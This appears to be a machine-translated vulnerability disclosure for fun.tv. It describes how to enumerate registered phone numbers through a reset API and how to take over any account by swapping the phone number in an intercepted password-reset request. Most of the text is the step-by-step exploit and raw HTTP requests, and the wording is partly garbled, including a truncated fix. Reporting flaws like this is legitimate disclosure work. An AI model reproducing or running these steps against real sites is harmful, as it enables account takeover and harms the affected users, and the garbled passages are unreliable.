Password Reset Vulnerability for any user on popular websites
The password reset operation is not associated with a specific mobile phone number. As a result, the password of any registered mobile phone account can be reset.
1. The returned results of the following url can be used to traverse all registered mobile accounts:
Http://api1.fun. TV /ajax/get_mobile_vcode/phone number /reset_password
Existing account, return:
{"Status": 200, "msg": "", "url": "", "field ":""}
If the account does not exist, return:
{"Status": 400, "msg": "wrong mobile", "url": "", "field ":""}
2. register an account on your mobile phone, execute password retrieval, enter the Received verification code, and click OK to go to the password reset interface;
3. enter a new password, enable fiddler to intercept the request, and click OK;
POST http://www.fun. TV /account/password/set? Isajax = 1 HTTP/1.1 Accept: */* Accept-Language: zh-cnReferer: Your XMLHttpRequestContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0 ;. net clr 2.0.50727; SLCC2 ;. net clr 3.5.30729 ;. net clr 3.0.30729 ;. NET4.0C ;. NET4.0E) Host: www. fun. tvContent-Length: 71 Connection: Keep-AlivePragma: no-cache... User_name = phone number & passwd = 8e93ff85d9b1670 & verifypass = 8e93ff85d9b1670
3. Use the phone number obtained in step 1 to replace the phone number in the request and initiate a new request. The password is successfully reset within the validity period of the verification code.
Proof of vulnerability:
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://www.fun.tv/account/password/setbymobilex-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: www.fun.tvContent-Length: 71Connection: Keep-AlivePragma: no-cacheuser_name=18612xxxx10&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://www.fun.tv/account/password/setbymobilex-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: www.fun.tvContent-Length: 71Connection: Keep-AlivePragma: no-cacheuser_name=18612xxx097&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670
Solution:
Expired creden. creden are associated with accounts.